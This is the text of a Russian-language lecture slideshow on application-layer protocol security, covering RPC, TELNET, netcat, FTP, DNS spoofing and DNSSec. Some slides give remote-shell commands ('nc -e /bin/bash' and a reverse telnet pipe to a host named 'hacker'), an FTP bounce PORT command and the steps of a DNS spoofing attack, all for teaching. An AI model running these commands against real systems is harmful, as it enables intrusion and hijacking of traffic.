Скачать презентацию
Идет загрузка презентации. Пожалуйста, подождите
Презентация была опубликована 10 лет назад пользователемАльбина Федькунова
2 Протоколы прикладного уровня Раздел 2 – Тема 15
3 Клиент Сервер Протокол обмена TELNET FTP HTTP Реализация служб прикладного уровня Уровень сетевого взаимодействия
4 Удалённый вызов процедур Канальный уровень Физический уровень Сетевой уровень Транспортный уровень Уровень соединения Уровень представления Уровень приложения Ethernet, FDDI, X.25 и другие Сетевой уровень IP TCP, UDP RPC
5 Клиент Сервер RPC Протокол RPC Спецификация RPC-сервера Номер программы Номер процедуры Номер версии
6 Клиент Сервер RPC Запрос клиента Спецификация RPC-сервера Номер программы Номер процедуры Номер версии Номер порта
7 Клиент Сервер RPC Номер процедуры RPC-сканирование Номер порта Примеры утилит для RPC-сканирования RPCScan (Linux) rpcdump (Windows)
8 Клиент (утилита telnet) Сервер (telnetd) Протокол обмена TELNET Протокол удалённого терминала - TELNET
9 Взаимодействие «терминал-удалённый процесс» Терминал – Серверный процесс $a a a a
10 Команды протокола TELNET Управляющий символ IACКоманда Параметры Interpret as Command, равен 255 Например, клавиша Backspace, байт
11 Команды протокола TELNET Название команды Код Описание команды IP (Interrupt Process)244 Прерывание процесса пользователя AO (Abort Output)245 Остановка вывода на дисплей AYT (Are You There)246Проверка состояния системы EC (Erase Character)247 Удаление последнего введённого символа EL (Erase Line)248Удаление текущей строки
12 Передача команд $a IAC EC Backspace $
13 Клиент (утилита telnet) Сервер (telnetd) Передача имени и пароля в открытом виде Уязвимости протокола TELNET
14 Изменение переменных окружения до аутентификации Уязвимости протокола TELNET Клиент (утилита telnet) Сервер (telnetd)
15 Что такое Netcat? Netcat - это утилита, которая позволяет читать и записывать данные по сети с использованием протоколов TCP или UDP. Возможности netcat : Работа с входящими и исходящими TCP или UDP соединениями, использующими любые порты Выполнение DNS запросов различных типов Возможность задания порта источника Возможность использования любого адреса источника (из локально сконфигурированных) Возможности по сканированию портов Работа в качестве telnet-сервера
16 Netcat и Telnet - клиент Telnet - клиент имеет ограничения, преодолеть которые поможет Netcat. Например: Ограничения стандартного потока ввода Посылка сообщений об ошибках в стандартный поток вывода, вместе с данными Невозможность посылки двоичных данных Невозможность находиться в состоянии ожидания соединения Невозможность работы с UDP
17 Режимы работы Netcat Режим исходящих соединений Режим ожидания входящих соединений Слушающий порт nc [-опции] порт[ы] nc –l –p [-опции] [узел] [порт]
18 Варианты использования Netcat Подключение к слушающему порту на удаленном узле Подключение с явным указанием порта источника nc nc –p
19 Варианты использования Netcat Открытие порта и подключение оболочки к нему nc –e /bin/bash nc –e cmd.exe Вариант для Linux Вариант для Windows
20 «Обращённый» TELNET Это управление узлом через соединение, инициируемое с него самого
21 «Обращённый» TELNET > telnet hacker 80 | /bin/bash | telnet hacker 25 /bin/bash Команды Результаты
22 Практическая работа 18 Утилита Netcat «Обращённый» TELNET
23 Клиент Сервер Команды Ответы Реализация службы FTP Интерфейс пользователя Модуль управления передачей Модуль передачи данных Данные Модуль управления передачей Модуль передачи данных
24 Пассивный вариант работы FTP Клиент Сервер (ftpd) команда PASV Ответ с параметрами (номер порта для подключения) Открытие соединения на указанный порт
25 Предсказуемый номер порта Клиент Сервер (ftpd) команда PASV Ответ с параметрами (номер порта для подключения) Открытие соединения на указанный порт Подключение раньше клиента
26 Открытие большого количества портов Сервер (ftpd) команда PASV Ответ с параметрами (номер порта для подключения) команда PASV Ответ с параметрами (номер порта для подключения) команда PASV Ответ с параметрами (номер порта для подключения)
27 Передача данных между двумя FTP-серверами Сервер (ftpd) Передача большого количества данных Управляющее соединение
28 Атаки на сетевые службы при помощи FTP Сервер FTP Почтовый сервер Подключение с FTP-сервера PORT 20,1,1,1,0,25 RETR
29 telnet Resolver - ? DNS Server DNS - служба
30 Домены и поддомены « » orgedu com company sale buhg Root Name Server company.com Name Server sale.company.com Name Server
31 Записи Resource Record main.sale.company.com. IN A sale sale.company.com Name Server sale.company.com. IN NS ns.sale.company.com
32 Разрешение имён ResolverResolver main.sale.company.com - ? com Name Server Root Server company.com NS sale.company.com NS
33 Применение транспортного протокола без установления соединения (UDP) Отсутствие идентификации и аутентификации Отсутствие средств разграничения доступа Уязвимости службы DNS
34 Пример атаки на IP - сеть: Атака на DNS Нарушение нормального функционирования объекта атаки Местонахождение атакующего В одном сегменте с объектом атаки Используемые уязвимости Цель Слабая защищённость протокола DNS - - недостаток проектирования Степень риска Высока я Нарушение навигации (ложный маршрут) Механизм реализации
35 Схема работы DNS - протокола DNS-сервер Хост А IP - адрес ID Имя компьютера SourcePort DNS-запрос DNS-ответ ID - генерируется приложением, пославшим запрос, обычно=1 SourcePort вначале принимает значение 1024 а потом увеличивается Пример атаки на IP - сеть: Атака на DNS
36 DNS-сервер Хост А ID Имя компьютера SourcePort DNS-запрос Хост А посылает DNS - запрос Нарушитель должен находиться в одной подсети с А или в одной подсети с DNS - сервером Это позволит ему перехватить пакет с запросом Пример атаки на IP - сеть: Атака на DNS
37 DNS-сервер Хост А DNS-запрос Нарушитель извлекает из запроса ID и SourcePort Ложный DNS - ответ: от имени настоящего DNS - сервера, но в качестве IP - адреса искомого узла указывается IP - адрес нарушителя Результат: хост А имеет неправильное соответствие между именем компьютера и IP - адресом Пример атаки на IP - сеть: Атака на DNS
38 Хост А Узел сети Теперь путь пакета от хоста А до узла сети будет лежать через хост нарушителя Пример атаки на IP - сеть: Атака на DNS
39 Пример атаки на IP - сеть: Атака на DNS (вариант 2) Нарушение нормального функционирования объекта атаки Местонахождение атакующего В разных сегментах с объектом атаки Используемые уязвимости Цель Слабая защищённость протокола DNS - - недостаток проектирования Степень риска Высока я Нарушение навигации (ложный маршрут) Механизм реализации
40 DNS-сервер Хост А ID IP - адрес DestPort Ложные DNS - ответы Перебор Пример атаки на IP - сеть: Атака на DNS (вариант 2)
41 DNS-сервер Хост А Ложные DNS - ответы Пример атаки на IP - сеть: Атака на DNS (вариант 2)
42 Хост А Узел сети Теперь путь пакета от хоста А до узла сети будет лежать через хост нарушителя Пример атаки на IP - сеть: Атака на DNS (вариант 2)
43 DNS-сервер ertr.mpei.ac.ru. Кэш - таблица DNS-сервер следующего уровня DNS-запрос DNS-ответ Пример атаки на IP - сеть: Атака на DNS (вариант 3)
44 DNS-сервер ertr.mpei.ac.ru. Кэш - таблица DNS-сервер следующего уровня DNS-запрос Ложные DNS - ответы Пример атаки на IP - сеть: Атака на DNS (вариант 3)
45 DNS-сервер ertr.mpei.ac.ru. Кэш - таблица Хост А DNS-запрос DNS-ответ Пример атаки на IP - сеть: Атака на DNS (вариант 3)
46 DNS в корпоративной сети Внешний узел Вторичный сервер Внутренний узел Первичный сервер Репликация Рекурсивный запрос Рекурсивные запросы Итеративные запросы DNS
47 DNS в корпоративной сети Доступ узлов корпоративной сети к полной информации о внутренних именах Доступ отдельных узлов корпоративной сети к глобальному пространству имён Internet Доступ внешних узлов к минимально необходимой информации о внутренних именах
48 Двухсерверная конфигурация Внешний узел Вторичный сервер Внутренний узел Первичный сервер (минимальная версия) Репликация Рекурсивный запрос Рекурсивный запрос Итеративные запросы Межсетевой экран Первичный сервер (полная версия) DNS
49 Трехсерверная конфигурация Внешний узел Вторичный сервер (минимальная версия) Внутренний узел (с Internet) Первичный сервер (минимальная версия) Репликация Рекурсивный запрос Рекурсивный запрос Итеративные запросы Межсетевой экран Первичный сервер (полная версия+корень) DNS Вторичный сервер (полная версия) Внутренний узел (без Internet)
50 Трёхсерверная конфигурация Первичный сервер (минимальная версия) Межсетевой экран Первичный сервер (полная версия) +корень DNS Вторичный сервер (полная версия) Internet
51 Протокол DNSSec Механизм распределения открытых ключей Целостность и аутентичность информации DNS Аутентификация транзакции
52 Новые записи Resource Record main.sale.company.com. IN A sale.company.com. IN NS ns.sale.company.com sale.company.com. IN KEY [ключ] sale.company.com. IN SIG [подпись] sale.company.com. IN NXT [домен]
53 Обычный DNS-запрос qname=main.sale.company.com qtype=A main.sale.company.com A Владелец sale.company.com NS ns.sale.company.com Дополнительно ns.sale.company.com A Запрос Ответ
54 Запрос DNSSec qname=main.sale.company.com qtype=A Вопрос main.sale.company.com A ? main.sale.company.com A main.sale.company.com SIG [подпись] Владелец sale.company.com NS ns.sale.company.com sale.company.com SIG [подпись] Дополнительно ns.sale.company.com A ns.sale.company.com SIG [подпись] sale.company.com KEY [ключ] main.sale.company.com KEY [ключ] ns.sale.company.com KEY [ключ] Запрос Ответ
55 Практическая работа 19 Просмотр и запись сессий TELNET и FTP при помощи RealSecure Настройка пользовательских событий для RealSecure
56 Раздел 2 – Итоги Модель OSI. Архитектура TCP/IP. Модель OSI. Архитектура TCP/IP. Модель OSI. Архитектура TCP/IP. Модель OSI. Архитектура TCP/IP. Сетевые анализаторы. Сетевые анализаторы. Сетевые анализаторы. Сетевые анализаторы. Программа Internet Scanner. Программа Internet Scanner. Программа Internet Scanner. Программа Internet Scanner. Межсетевые экраны. Межсетевые экраны. Межсетевые экраны. Межсетевые экраны. Протоколы IPSec, SSL, SSH, DNSSec Протоколы IPSec, SSL, SSH, DNSSec Протоколы IPSec, SSL, SSH, DNSSec Протоколы IPSec, SSL, SSH, DNSSec Система обнаружения атак RealSecure. Система обнаружения атак RealSecure. Система обнаружения атак RealSecure. Система обнаружения атак RealSecure. Cлужбы прикладного уровня. Cлужбы прикладного уровня. Cлужбы прикладного уровня. Cлужбы прикладного уровня.
Еще похожие презентации в нашем архиве:
© 2024 MyShared Inc.
All rights reserved.